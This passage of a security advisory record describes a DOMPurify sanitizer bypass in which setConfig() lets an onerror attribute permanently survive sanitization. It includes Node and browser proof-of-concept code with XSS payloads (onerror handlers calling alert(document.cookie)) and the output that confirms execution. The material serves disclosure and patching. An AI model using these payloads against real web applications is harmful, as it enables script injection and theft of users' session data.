d.allowedAttributes[\u0027onerror\u0027] = true;\n });\n DP.sanitize(\u0027\u003cimg data-trusted=\"1\" src=\"x\" onerror=\"ok()\"\u003e\u0027);\n DP.removeAllHooks();\n let leaks = 0;\n for (let i = 0; i \u003c 5; i++) if (/onerror/.test(DP.sanitize(\u0027\u003cimg src=\"x\" onerror=\"alert(\u0027+i+\u0027)\"\u003e\u0027))) leaks++;\n log(\u0027[persist] survived \u0027 + leaks + \u0027/5 calls after removeAllHooks()\u0027);\n DP.clearConfig();\n log(\u0027[persist] after clearConfig(): \u0027 + DP.sanitize(\u0027\u003cimg src=\"x\" onerror=\"alert(1)\"\u003e\u0027) + \u0027 (reset)\u0027);\n}\n```\n\nExpected output:\n```\n[PoC1] attacker output : \u003cimg src=\"x\" onerror=\"alert(document.cookie)\"\u003e\n[PoC1] onerror survived : true\n[PoC1] isValidAttribute(img,onerror) -\u003e true (shared gate poisoned)\n[PoC2] benign title leaks: \u003cspan title=\"leaked\"\u003ex\u003c/span\u003e\n[PoC3] control output : \u003cimg src=\"x\"\u003e stripped: true\n[persist] survived 5/5 calls after removeAllHooks()\n[persist] after clearConfig(): \u003cimg src=\"x\"\u003e (reset)\n```\n\n## Appendix B \u2014 Browser PoC (complete; confirms execution)\n\n```html\n\u003c!doctype html\u003e\u003chtml\u003e\u003chead\u003e\u003cmeta charset=\"utf-8\"\u003e\n\u003cscript src=\"https://cdn.jsdelivr.net/npm/dompurify@3.4.10/dist/purify.min.js\"\u003e\u003c/script\u003e\n\u003c/head\u003e\u003cbody\u003e\u003cpre id=\"out\"\u003e\u003c/pre\u003e\n\u003cscript\u003e\nconst log = (s) =\u003e document.getElementById(\u0027out\u0027).textContent += s + \u0027\\n\u0027;\nwindow.__fired = [];\nwindow.alert = (x) =\u003e window.__fired.push(\u0027alert:\u0027 + x); // sentinel: capture exec, no modal\nlog(\u0027DOMPurify \u0027 + DOMPurify.version);\n\n// App init: persistent policy + a hook allowing onerror ONLY for trusted elements\nDOMPurify.setConfig({ ALLOWED_TAGS: [\u0027img\u0027], ALLOWED_ATTR: [\u0027src\u0027] });\nDOMPurify.addHook(\u0027uponSanitizeAttribute\u0027, (node, data) =\u003e {\n if (node.getAttribute \u0026\u0026 node.getAttribute(\u0027data-trusted\u0027) === \u00271\u0027) data.allowedAttributes[\u0027onerror\u0027] = true;\n});\n\nDOMPurify.sanitize(\u0027\u003cimg data-trusted=\"1\" src=\"x\" onerror=\"0\"\u003e\u0027); // one trusted render\nconst out = DOMPurify.sanitize(\u0027\u003cimg src=\"x\" onerror=\"alert(\\\u0027XSS:\\\u0027+document.domain)\"\u003e\u0027); // attacker\nlog(\u0027attacker sanitized output: \u0027 + out);\nconst host = document.createElement(\u0027div\u0027);\nhost.innerHTML = out; // surviving onerror arms on the broken-src img\ndocument.body.appendChild(host);\n\nsetTimeout(() =\u003e {\n log(\u0027handlers fired: \u0027 + JSON.stringify(window.__fired));\n log(window.__fired.length ? \u0027RESULT: XSS EXECUTED\u0027 : \u0027RESULT: no execution\u0027);\n}, 500);\n\u003c/script\u003e\u003c/body\u003e\u003c/html\u003e\n```\n\nObserved: `handlers fired: [\"alert:XSS:\u003cdomain\u003e\"]` \u2192 **RESULT: XSS EXECUTED** (no user interaction). The same harness without the `setConfig()` line strips `onerror` and does not fire.",
"id": "GHSA-cmwh-pvxp-8882",
"modified": "2026-06-18T14:27:37Z",
"published": "2026-06-18T14:27:37Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-cmwh-pvxp-8882"
},
{
"type": "PACKAGE",
"url": "https://github.com/cure53/DOMPurify"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N",
"type": "CVSS_V4"
}
],
"summary": "DOMPurify: Permanent `ALLOWED_ATTR` pollution via `setConfig()` bypassing the hook clone-guard (incomplete fix of the 3.4.7 hook-pollution patch)"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.